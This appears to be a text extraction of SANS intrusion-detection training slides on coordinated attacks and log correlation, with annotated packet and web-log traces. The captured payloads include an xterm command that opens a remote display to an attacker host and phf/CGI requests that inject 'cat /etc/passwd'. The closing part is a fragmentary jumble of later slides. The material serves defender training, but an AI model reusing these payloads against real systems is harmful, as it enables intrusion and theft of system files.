1 IDIC – SANS GIAC LevelTwo ©2000, 2001 1 Coordinated Attacks (multiple attackers working together to increase their stealth and firepower) In our final section we are going to examine data from multiple sources. We will begin by introducing the notion of attackers working together; then we will discuss defenders working together. From an attacker’s standpoint, there are two primary advantages to coordinated or distributed attacks: - Stealth. By working from multiple IP addresses, the attackers are more difficult to detect. In addition, stealth is enhanced by the development of hard-to-detect probing techniques. - Firepower. By coordinating multiple attacking IP addresses, the attackers will be able to deliver more exploits at a target in a smaller time window. The target in this case can be one or more sites. Further, the defense technique of blocking an attacker site (shunning) will be less effective. 2 IDIC - SANS GIAC LevelTwo ©2000, 2001 2 External Network Mapping 10:32:24.722 north.mappem.com.38758 > ns.target.net.33476: udp 12 10:32:24.756 north.mappem.com.38758 > ns.target.net.33477: udp 12 10:32:24.801 north.mappem.com.38758 > ns.target.net.33478: udp 12 10:32:24.833 north.mappem.com.38758 > ns.target.net.33479: udp 12 10:32:24.944 north.mappem.com.38758 > ns.target.net.33481: udp 12 10:32:24.975 north.mappem.com.38758 > ns.target.net.33482: udp 12 10:32:26.745 south.mappem.com.48412 > ns.target.net.33512: udp 12 10:32:26.837 south.mappem.com.48412 > ns.target.net.33513: udp 12 10:32:26.930 south.mappem.com.48412 > ns.target.net.33514: udp 12 10:32:27.033 south.mappem.com.48412 > ns.target.net.33515: udp 12 10:32:27.231 south.mappem.com.48412 > ns.target.net.33517: udp 12 10:32:27.436 south.mappem.com.48412 > ns.target.net.33519: udp 12 10:32:26.541 east.mappem.com.58853 > ns.target.net.33491: udp 12 10:32:26.744 east.mappem.com.58853 > ns.target.net.33493: udp 12 10:32:26.836 east.mappem.com.58853 > ns.target.net.33494: udp 12 10:32:26.930 east.mappem.com.58853 > ns.target.net.33495: udp 12 10:32:27.033 east.mappem.com.58853 > ns.target.net.33496: udp 12 10:32:27.232 east.mappem.com.58853 > ns.target.net.33498: udp 12 10:32:27.323 east.mappem.com.58853 > ns.target.net.33499: udp 12 Simultaneous Traceroutes The same technique may also be used for network triangulation and development of network state. Note the detect times; the traceroutes hit the target, a DNS server, from multiple locations within a few seconds. This will allow them to have timing data for multiple paths. They would then be able to use the state information to determine the best route to this site. The stimulus here was one of the internal hosts visiting a Web server at the ISP. The ISP wants to give the best possible service, so it runs a packet back from a couple backbones, does some calculations to determine where the closest server is, and transfers the connection to this server the next time they click a URL. 3 IDIC - SANS GIAC LevelTwo ©2000, 2001 3 Protected Network External Network Mapping Concept ISP # 2 ISP # 1 Goal is to determine what machines make up the external layer of the protected network. = Internet Router Out of band network Here is the concept in cartoons. From multiple endpoints, you fire packets at a single location from multiple backbones probably connected via an out of band network. Note that you gather a lot of information about the space that is outside the target network, and they are not even aware of that. Also note that in the end there are a finite number of choke points. This is one of the concerns we have with this type of information gathering. The state table can be used to give the best possible service, but it may also be used to orchestrate an attack. 4 IDIC - SANS GIAC LevelTwo ©2000, 2001 4 Searching for Back Orifice 04:10:34.355832 dax.no.1534 > TARGETBa.31337: udp 19 04:51:15.261462 cpu.com.1534 > TARGETBb.31337: udp 19 04:54:19.101595 dax.no.1534 > TARGETBc.31337: udp 19 06:51:39.392441 dax.no.1534 > TARGETAa.31337: udp 19 06:52:32.700418 cpu.com.1534 > TARGETAb.31337: udp 19 06:06:52.320331 eb.net.1534 > TARGETAc.31337: udp 19 Here is a simple signature, trolling for Back Orifice. But before you relax too much, take a closer look. In a short time frame, three attackers with the same signature were detected at multiple target locations. eb may be working independently; this machine was not seen at all the attacked sites. Is this a coincidence or could the machines be working together? Given the data shown on the slide, it is hard to say. Even though they were seen at four different locations at fairly close time intervals, it is not possible to say they were working together. They could simply have the same attack address list or address generation algorithm and have started an automated process at the same time. On the other hand, to rule out that the systems are working together might not be wise. With site A and site B, do they tend to scan the same addresses? This would be an indication they are using the same address list. If within A and B they tend to scan DIFFERENT addresses, you have a pattern worth further study. 5 IDIC - SANS GIAC LevelTwo ©2000, 2001 5 Simultaneous RESET Scans By Related Addresses 17:40:45.870769 hook.24408 > target1.1457: R 0:0(0) ack 674719802 win 0 17:40:53.025203 hook.33174 > target2.1457: R 0:0(0) ack 674719802 win 0 17:41:12.115554 hook.36250 > target3.1979: R 0:0(0) ack 674719802 win 0 17:43:37.605127 router > hook: icmp: time exceeded in-transit 17:43:43.139158 hook.44922 > target4.1496: R 0:0(0) ack 674719802 win 0 17:42:30.400665 grin.3532 > target1a.1167: R 0:0(0) ack 674719802 win 0 17:42:40.582531 grin.33233 > target2a.1797: R 0:0(0) ack 674719802 win 0 17:44:28.836701 grin.52504 > target3a.1634: R 0:0(0) ack 674719802 win 0 17:47:52.578558 grin.46657 > target4a.2121: R 0:0(0) ack 674719802 win 0 17:47:52.698378 router > grin: icmp: time exceeded in-transit 674719802 is a signature ACK number of a SYN flood. If you are an analyst, you want to put your quarter on a denial of service attack. For that to be true, both hook and grin would have to be under attack at the same time. Are these a stimulus or a response? A RST is a response. If the RST is coming to target1, etc., then this must have been the source address range used for the denial of service. Let’s take a conspiracy theory pause. Even if this really is a denial of service attack against hook and grin, do they get mapping information about this site? They certainly do; the target site is not behind a NAT and will give out important data. Note the ICMP error messages. 6 IDIC - SANS GIAC LevelTwo ©2000, 2001 6 DNS ZONE Variation One IP attacks, the second IP receives the data 01:46:06.41 attacker.23616 > target.domain: S 4076745461:4076745461(0) win 512 <mss 1460> 01:46:06.42 target.domain > attacker.23616: S 208525112 2:2085251122(0) ack 4076745462 win 17520 <mss 1460> (DF) 01:46:07.14 attacker.23616 > target.domain: . ack 1 win 31744 (DF) 01:46:07.34 attacker.23616 > target.domain: P 1:3(2) ack 1 win 31744 (DF) 01:46:07.51 target.domain > attacker.23616: . ack 3 win 17520 (DF) 01:46:07.58 attacker.23616 > target.domain: . 3:1463(1460) ack 1 win 31744 (DF) 01:46:07.61 attacker.23616 > target.domain: P 1463:1563(100) ack 1 win 31744 (DF) 01:46:07.61 attacker.23616 > target.domain: F 1563:1563(0) ack 1 win 31744 Courtesy Pedro Vazquez - Unicamp In the example above, the attacker scans the net until he finds a DNS server that will respond on 53 TCP. The attacker establishes a connection. There is a data transfer; he then sends attack packets, including the strings shown on the next slide. 7 IDIC - SANS GIAC LevelTwo ©2000, 2001 7 DNS ZONE Variation (2) One IP attacks, the second IP receives the data Courtesy Pedro Vazquez - Unicamp Content from the attack packets (cleaned up of 8bit chars) sent against the DNS servers (target): %strings ibm|grep bin /usr/X11R6/bin/xterm -display Attacker2:0 /usr/X11R6/bin/xterm -display Attacker2:0 /usr/X11R6/bin/xterm -display Attacker2:0 /usr/X11R6/bin/xterm -display Attacker2:0 /usr/X11R6/bin/xterm -display Attacker2:0 The point of this is to give them terminal access on the DNS server. In this attack, they probe from one site and then try to open up a remote terminal to a second location. It should be noted this is a wonderful opportunity to counterattack, but we won’t go there : ) 8 IDIC - SANS GIAC LevelTwo ©2000, 2001 8 Correlation ( the current frontier ) • Single sensor coverage is a computerized form of tunnel vision • Successful analysis requires: – Fusing observations from multiple types of sensors – Correlating observations from similar sensors – Building the answer a piece at a time In our final section, we want to look at some attacks that have the same event, or a similar event, shown from more than one log source. Correlation is one of the most important techniques available to an analyst. 9 IDIC - SANS GIAC LevelTwo ©2000, 2001 9 Manual Correlation Benefits • Primary key to maintain situational awareness • System log file and an alert system administrator can greatly enhance site’s detection effectiveness • Correlating system information with network logs can help scope the size and intensity of an event Within a site, correlating ID sensors and system logs is a powerful tool. With TCP Wrappers or the equivalent, detection is near real time. If there is an alarming syslog capability such as swatch, ID sensors can be focused on the connecting host. As we correlate logs from multiple sources, we get a better and better picture of what is happening. This is how we can determine how widespread and serious an attack is. This is how we determine situational awareness. A good analyst should never rely on a single type of log file. 10 IDIC - SANS GIAC LevelTwo ©2000, 2001 10 Correlation Approach • Locate secondary sources of data at your facility (network ID and system logs) • To the extent you can, share detect data with others, source addresses and detect patterns • Learn to read a variety of log formats Many times, a different sensor such as a host log will have additional information than one can get from a network sensor. However, you have to locate these data sources ahead of time if they are going to be of any value when you come under attack. Also, it can take a while to get comfortable with different log formats. We certainly don’t know all of them, but it really makes sense to know the ones at your facility. [...]... 2413 0300 fd3e f823 2241 a4ad 425a 5a03 1119 3282 6c79 31 E c ` 2 4$ >.# "A BZZ 2 .tly Outline • Background • Common Errors • Exploits and Denial of Service Attacks • Network Mapping / Information Gathering • Subtle and Stealthy Attacks • Coordinated Attacks Now get out there and collect and examine some traces, and don’t forget to send interesting ones to intrusion@sans.org IDIC - SANS GIAC LevelTwo ©2000,... Note the backspaces; this is a sure sign someone is entering email from the keyboard and no, this is an actual detect, we didn’t make this one up, promise 19 19 PHF and other CGI-BIN Correlating similar attacks 1997 attacker - - [08/Nov/1997:04:47:16 -0500] "GET /cgibin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=&Qname =foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh _school=&Qslip="... -0500] "GET /cgibin/handler/useless_shit;cat /etc/passwd|?data=Download" 404 161 IDIC - SANS GIAC LevelTwo ©2000, 2001 We apologize if this slide offends anyone, but back in 1997 we knew about two CGIBIN attacks, phf and php It seemed if there were two, there could be three, or seven The trace on your slide is the result of a cron job looking through the web logs for any cgi-bin other than the ones we... address as ingreslock detect one day later IDIC - SANS GIAC LevelTwo ©2000, 2001 13 TCP port 600 is pcserver, a common backdoor, so this is essentially the same problem as ingreslock Notice that the two attacks, the one on this slide and the one on the previous slide, are launched by the same IP address, which is assigned to PC WARE International What is going on here? Probably they are looking for ALREADY . 1 IDIC – SANS GIAC LevelTwo ©2000, 2001 1 Coordinated Attacks (multiple attackers working together to increase their stealth. an attacker’s standpoint, there are two primary advantages to coordinated or distributed attacks: - Stealth. By working from multiple IP addresses, the